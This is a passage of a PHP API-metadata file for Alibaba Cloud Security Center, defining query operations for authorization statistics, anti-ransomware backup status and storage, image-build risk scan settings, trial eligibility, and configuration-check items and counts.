10,\\n \\"PostPaidBindEcsCount\\": 10\\n },\\n \\"VersionSummary\\": [\\n {\\n \\"Index\\": 1,\\n \\"Version\\": 3,\\n \\"UsedCoreCount\\": 10,\\n \\"UnUsedCount\\": 10,\\n \\"UsedEcsCount\\": 10,\\n \\"TotalCount\\": 10,\\n \\"TotalEcsAuthCount\\": 10,\\n \\"TotalCoreAuthCount\\": 10,\\n \\"UnusedEcsAuthCount\\": 10,\\n \\"UnusedCoreAuthCount\\": 10,\\n \\"AuthBindType\\": \\"ASSET\\"\\n }\\n ],\\n \\"AllowUserUnbind\\": 1,\\n \\"PostPaidVersionSummary\\": [\\n {\\n \\"AuthBindType\\": \\"ASSET\\",\\n \\"Version\\": 3,\\n \\"Index\\": 1,\\n \\"UsedCoreCount\\": 10,\\n \\"UsedEcsCount\\": 10\\n }\\n ],\\n \\"PostPaidHostAutoBind\\": \\"1\\",\\n \\"PostPaidHostAutoBindVersion\\": \\"7\\",\\n \\"PostPaidHighestVersion\\": \\"7\\",\\n \\"InvalidBindStatus\\": \\"INVALID_NODE_VERSION\\",\\n \\"ClusterNodeCheck\\": 1,\\n \\"EdrSummary\\": {\\n \\"BoundCount\\": \\"\\",\\n \\"PostPaidAutoBind\\": \\"\\",\\n \\"HybridPaidAutoBind\\": \\"\\"\\n }\\n}","type":"json"}]', ], 'GetAuthVersionStatistic' => [ 'summary' => 'Query asset authorization quantity statistics.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'Response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request. It can be used for troubleshooting and problem locating.', 'type' => 'string', 'example' => '2CA2BDF6-F3BD-51A4-BAAC-30B02F7A3FBB', 'title' => ''], 'Statistics' => [ 'description' => 'Collection of asset authorization version statistics.', 'type' => 'array', 'items' => [ 'description' => 'Asset authorization version statistics.', 'type' => 'object', 'properties' => [ 'AuthVersion' => ['description' => 'The version of Security Center. Valid values:'."\n" ."\n" .'- **1**: Free edition (unauthorized)'."\n" .'- **6**: Anti-virus edition'."\n" .'- **5**: Advanced edition'."\n" .'- **3**: Enterprise edition'."\n" .'- **7**: Ultimate edition'."\n" .'- **10**: Value-added services only', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'Count' => ['description' => 'The number of currently authorized servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset authorization quantity statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAuthVersionStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAuthVersionStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2CA2BDF6-F3BD-51A4-BAAC-30B02F7A3FBB\\",\\n \\"Statistics\\": [\\n {\\n \\"AuthVersion\\": 6,\\n \\"Count\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'GetBackupAutoConfigStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'CanConfigAuto' => ['description' => 'Indicates whether the managed service supports configuring anti-ransomware backup policies. Valid values:'."\n" .'- **false**: Not supported.'."\n" .'- **true**: Supported.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '898F7AA7-CECD-5EC7-AF4D-664C601B****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query anti-ransomware managed service status', 'summary' => 'Queries whether the anti-ransomware managed service supports automatic configuration of anti-ransomware server backup policies.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetBackupAutoConfigStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetBackupAutoConfigStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"CanConfigAuto\\": false\\n },\\n \\"RequestId\\": \\"898F7AA7-CECD-5EC7-AF4D-664C601B****\\"\\n}","type":"json"}]', ], 'GetBackupStorageCount' => [ 'summary' => 'Queries the used anti-ransomware storage capacity.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '33C2CCFF-4BF8-5F88-9B5C-22F932F80E5A', 'title' => ''], 'BackupStorageCount' => [ 'description' => 'The details of the anti-ransomware storage capacity.', 'type' => 'object', 'properties' => [ 'Overflow' => ['description' => 'Indicates whether the anti-ransomware usage exceeds the purchased capacity. Valid values:'."\n" ."\n" .'- **0**: not exceeded'."\n" .'- **1**: exceeded.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'UniUsageStorageByte' => ['description' => 'The storage capacity occupied by database backups in the backup data. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '7453049350', 'title' => ''], 'BuyStorageByte' => ['description' => 'The purchased anti-ransomware capacity. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '2276332666880', 'title' => ''], 'UsageStorageByte' => ['description' => 'The total used anti-ransomware storage capacity. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '839621565853', 'title' => ''], 'EcsUsageStorageByte' => ['description' => 'The storage capacity occupied by server backups in the backup data. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '817262417803', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query used anti-ransomware storage capacity', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetBackupStorageCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetBackupStorageCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"33C2CCFF-4BF8-5F88-9B5C-22F932F80E5A\\",\\n \\"BackupStorageCount\\": {\\n \\"Overflow\\": 0,\\n \\"UniUsageStorageByte\\": 7453049350,\\n \\"BuyStorageByte\\": 2276332666880,\\n \\"UsageStorageByte\\": 839621565853,\\n \\"EcsUsageStorageByte\\": 817262417803\\n }\\n}","type":"json"}]', ], 'GetBuildRiskDefineRuleConfig' => [ 'summary' => 'Queries the risk scan configuration for image build commands.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '234935', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the risk scan configuration for image build commands.', 'type' => 'integer', 'format' => 'int64', 'example' => '273698***', 'title' => ''], 'RuleCount' => ['description' => 'The total number of check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'SelectedCount' => ['description' => 'The number of selected check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '99', 'title' => ''], 'RuleTree' => [ 'description' => 'The collection of check item selections.', 'type' => 'array', 'items' => [ 'description' => 'The check item category.', 'type' => 'object', 'properties' => [ 'ClassKey' => ['description' => 'The classification of the check item.', 'type' => 'string', 'example' => 'other', 'title' => ''], 'ClassName' => ['description' => 'The name of the check item classification.', 'type' => 'string', 'example' => 'other', 'title' => ''], 'RuleList' => [ 'description' => 'The collection of check items.', 'type' => 'array', 'items' => [ 'description' => 'The individual check item.', 'type' => 'object', 'properties' => [ 'RuleKey' => ['description' => 'The check item key.', 'type' => 'string', 'example' => 'add', 'title' => ''], 'RuleName' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => 'used ADD', 'title' => ''], 'Selected' => ['description' => 'Indicates whether the check item is selected. Valid values:'."\n" .'- **true**: Selected.'."\n" .'- **false**: Not selected.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the API call is successful. Valid values:'."\n" ."\n" .'- **true**: The API call is successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the API request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '69BFFCDE-37D6-5A49-A8BC-BB03AC83****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'Service error, please try again later.', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query risk scan configuration for image build commands', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetBuildRiskDefineRuleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetBuildRiskDefineRuleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 0,\\n \\"RuleCount\\": 100,\\n \\"SelectedCount\\": 99,\\n \\"RuleTree\\": [\\n {\\n \\"ClassKey\\": \\"other\\",\\n \\"ClassName\\": \\"other\\",\\n \\"RuleList\\": [\\n {\\n \\"RuleKey\\": \\"add\\",\\n \\"RuleName\\": \\"used ADD\\",\\n \\"Selected\\": true\\n }\\n ]\\n }\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"69BFFCDE-37D6-5A49-A8BC-BB03AC83****\\"\\n}","type":"json"}]', ], 'GetCanTrySas' => [ 'summary' => 'Checks whether the current user is qualified for the trial use of Security Center.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'FromEcs', 'in' => 'formData', 'schema' => ['description' => 'Specifies whether the request is redirected from the Elastic Compute Service (ECS) console. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'CanTry' => ['description' => 'Indicates whether the user is qualified for the trial use. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => 'true', 'title' => ''], 'TryType' => ['description' => 'The trial type. Valid values:'."\n" ."\n" .'* **0**: trial prohibited'."\n" .'* **1**: first trial'."\n" .'* **2**: second trial'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CanTryVersions' => [ 'description' => 'The editions that are allowed for the trial use.'."\n", 'type' => 'array', 'items' => ['description' => 'The edition. Valid values:'."\n" ."\n" .'* **3**: Enterprise'."\n" .'* **7**: Ultimate'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '8BAA57***B7073A5C1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"CanTry\\": 0,\\n \\"TryType\\": 1,\\n \\"CanTryVersions\\": [\\n 7\\n ]\\n },\\n \\"RequestId\\": \\"8BAA57***B7073A5C1\\"\\n}","type":"json"}]', 'title' => 'GetCanTrySas', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCanTrySas'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCanTrySas', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetCheckConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'GetCheckConfigResponse', 'type' => 'object', 'properties' => [ 'CycleDays' => [ 'description' => 'The periodic check schedule.', 'type' => 'array', 'items' => ['description' => 'The day of the week on which the periodic check is performed.', 'type' => 'integer', 'format' => 'int32', 'example' => '[1, 2, 3, 4, 5]', 'title' => ''], 'title' => '', 'example' => '', ], 'StartTime' => ['title' => '', 'description' => 'The start hour of the check time window, indicating the hour of the day when the check starts.', 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'EndTime' => ['title' => '', 'description' => 'The end hour of the check time window, indicating the hour of the day when the check ends. The start time and end time must be within one of the following time ranges:'."\n" ."\n" .'- **0~6**: If the start time is 0, the end time must be set to 6.'."\n" .'- **6~12**: If the start time is 6, the end time must be set to 12.'."\n" .'- **12~18**: If the start time is 12, the end time must be set to 18.'."\n" .'- **18~24**: If the start time is 18, the end time must be set to 24.', 'type' => 'integer', 'format' => 'int32', 'example' => '6'], 'Standards' => [ 'description' => 'The list of check item information.', 'type' => 'array', 'items' => [ 'description' => 'The check item information.', 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '1'], 'ShowName' => ['title' => '', 'description' => 'The name of the check item.', 'type' => 'string', 'example' => '云产品配置管理'], 'Type' => ['description' => 'The type of the check item. Valid values:'."\n" ."\n" .'- **RISK:** Cloud service configuration management.'."\n" .'- **IDENTITY_PERMISSION:** Identity and permission management.'."\n" .'- **COMPLIANCE:** Compliance.', 'type' => 'string', 'example' => 'RISK', 'title' => ''], 'Status' => ['description' => 'The enabling status of the check item. Valid values:'."\n" ."\n" .'- **ON:** Enabled.'."\n" .'- **OFF:** Shutdown.', 'type' => 'string', 'example' => 'ON', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '5A3D5C8F-2A42-5477-BDD8-27E64B5F1739', 'title' => ''], 'EnableAutoCheck' => ['description' => 'Indicates whether automatic periodic checks are enabled. Valid values:'."\n" ."\n" .'- **true:** Enabled.'."\n" .'- **false:** Disabled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'EnableAddCheck' => ['description' => 'Indicates whether new check items added to the selected standards are checked by default. Valid values:'."\n" ."\n" .'- **true:** Enabled.'."\n" .'- **false:** Disabled.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'SelectedChecks' => [ 'description' => 'The check items selected in the policy.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'SectionId' => ['description' => 'The section ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '69', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Retrieve check item configurations for cloud platform configuration checks', 'summary' => 'Retrieves the check item configurations for cloud platform configuration checks.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CycleDays\\": [\\n 0\\n ],\\n \\"StartTime\\": 0,\\n \\"EndTime\\": 6,\\n \\"Standards\\": [\\n {\\n \\"Id\\": 1,\\n \\"ShowName\\": \\"云产品配置管理\\",\\n \\"Type\\": \\"RISK\\",\\n \\"Status\\": \\"ON\\"\\n }\\n ],\\n \\"RequestId\\": \\"5A3D5C8F-2A42-5477-BDD8-27E64B5F1739\\",\\n \\"EnableAutoCheck\\": true,\\n \\"EnableAddCheck\\": false,\\n \\"SelectedChecks\\": [\\n {\\n \\"CheckId\\": 3,\\n \\"SectionId\\": 69\\n }\\n ]\\n}","type":"json"}]', ], 'GetCheckCountStatistic' => [ 'summary' => 'Queries statistics on the number of risk items in cloud security posture management (CSPM) for cloud services.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '203837', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ', 'FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The cloud service providers.', 'type' => 'array', 'items' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud.'."\n" ."\n" .'- **TENCENT**: Tencent Cloud.'."\n" ."\n" .'- **MICROSOFT**: Microsoft Azure.'."\n" ."\n" .'- **AWS**: Amazon Web Services (AWS).', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StatisticType', 'in' => 'query', 'schema' => ['description' => 'The type of the statistics. Valid values:'."\n" ."\n" .'- **user**: the top five users that are granted excessive permissions.'."\n" ."\n" .'- **role**: the top five roles that are granted excessive permissions.'."\n" ."\n" .'- **instance**: the top five cloud services on which risks are detected.'."\n" ."\n" .'- **host**: the top five servers on which baseline risks are detected.', 'type' => 'string', 'required' => false, 'example' => 'instance', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Language parameter', 'type' => 'string', 'example' => 'zh', 'required' => false], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Task source.', 'type' => 'array', 'items' => ['description' => 'Task source. Values: - **YAO\\_CHI**: YaoChi Console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'example' => 'zh', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***', 'title' => ''], 'CheckCountStatisticDTO' => [ 'description' => 'The risk item statistics.', 'type' => 'object', 'properties' => [ 'CheckCountStatisticItems' => [ 'title' => '', 'description' => 'The risk item statistics.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The instance ID of the cloud service.', 'type' => 'string', 'example' => 'i-wz9bpxyu6t74qn9g****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'launch-advisor-2021****', 'title' => ''], 'RiskCount' => ['description' => 'The number of risk items.', 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'Vendor' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud.'."\n" ."\n" .'- **TENCENT**: Tencent Cloud.'."\n" ."\n" .'- **MICROSOFT**: Microsoft Azure.'."\n" ."\n" .'- **AWS**: AWS.', 'type' => 'integer', 'format' => 'int32', 'example' => 'ALIYUN', 'title' => ''], 'InstanceType' => ['description' => 'The asset type. Valid values:'."\n" ."\n" .'- **0**: Elastic Compute Service (ECS) instance.'."\n" ."\n" .'- **1**: Server Load Balancer (SLB) instance.'."\n" ."\n" .'- **2**: NAT gateway.'."\n" ."\n" .'- **3**: ApsaraDB RDS instance.'."\n" ."\n" .'- **4**: ApsaraDB for MongoDB (MongoDB) instance.'."\n" ."\n" .'- **5**: Tair (Redis OSS-compatible) (Tair) instance.'."\n" ."\n" .'- **6**: container image.'."\n" ."\n" .'- **7**: container.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceSubType' => ['description' => 'The subtype of the cloud service.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The region.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'InstanceTypeName' => ['description' => 'The asset type of the cloud service. Valid values:'."\n" ."\n" .'- **ECS**: ECS.'."\n" ."\n" .'- **SLB**: SLB.'."\n" ."\n" .'- **RDS**: ApsaraDB RDS.'."\n" ."\n" .'- **MONGODB**: ApsaraDB for MongoDB.'."\n" ."\n" .'- **KVSTORE**: Tair.'."\n" ."\n" .'- **ACR**: Container Registry.'."\n" ."\n" .'- **CSK**: Container Service for Kubernetes (ACK).'."\n" ."\n" .'- **VPC**: Virtual Private Cloud (VPC).'."\n" ."\n" .'- **ACTIONTRAIL**: ActionTrail.'."\n" ."\n" .'- **CDN**: Alibaba Cloud CDN (CDN).'."\n" ."\n" .'- **CAS**: Certificate Management Service (formerly SSL Certificates Service).'."\n" ."\n" .'- **RDC**: Alibaba Cloud DevOps.'."\n" ."\n" .'- **RAM**: Resource Access Management (RAM).'."\n" ."\n" .'- **DDOS**: Anti-DDoS.'."\n" ."\n" .'- **WAF**: Web Application Firewall (WAF).'."\n" ."\n" .'- **OSS**: Object Storage Service (OSS).'."\n" ."\n" .'- **POLARDB**: PolarDB.'."\n" ."\n" .'- **POSTGRESQL**: ApsaraDB RDS for PostgreSQL.'."\n" ."\n" .'- **MSE**: Microservices Engine (MSE).'."\n" ."\n" .'- **NAS**: File Storage NAS (NAS).'."\n" ."\n" .'- **SDDP**: Sensitive Data Discovery and Protection (SDDP).'."\n" ."\n" .'- **EIP**: Elastic IP Address (EIP).', 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'InstanceSubTypeName' => ['description' => 'The asset subtype of the cloud service. Valid values:'."\n" ."\n" .'- If **InstanceTypeName** is set to **ECS**, this parameter supports the following valid values:'."\n" ."\n" .' - **INSTANCE**'."\n" ."\n" .' - **DISK**'."\n" ."\n" .' - **SECURITY\\_GROUP**'."\n" ."\n" .'- If **InstanceTypeName** is set to **ACR**, this parameter supports the following valid values:'."\n" ."\n" .' - **REPOSITORY\\_ENTERPRISE**'."\n" ."\n" .' - **REPOSITORY\\_PERSON**'."\n" ."\n" .'- If **InstanceTypeName** is set to **RAM**, this parameter supports the following valid values:'."\n" ."\n" .' - **ALIAS**'."\n" ."\n" .' - **USER**'."\n" ."\n" .' - **POLICY**'."\n" ."\n" .' - **GROUP**'."\n" ."\n" .'- If **InstanceTypeName** is set to **WAF**, this parameter supports the following valid value:'."\n" ."\n" .' - **DOMAIN**'."\n" ."\n" .'- If **InstanceTypeName** is set to other values, this parameter supports the following valid values:'."\n" ."\n" .' - **INSTANCE**', 'type' => 'string', 'example' => 'INSTANCE', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the host instance.', 'type' => 'string', 'example' => 'c9107c04-942f-40c1-981a-f1c1****'."\n", 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the host instance.', 'type' => 'string', 'example' => '1.2.XX.XX'."\n", 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the host instance.', 'type' => 'string', 'example' => '1.2.XX.XX'."\n", 'title' => ''], 'Os' => ['description' => 'The version of the operating system that the host instance runs.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'Cores' => ['description' => 'The number of the CPU cores used by the host instance.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'VpcInstanceId' => ['description' => 'The ID of the VPC to which the host instance belongs.', 'type' => 'string', 'example' => 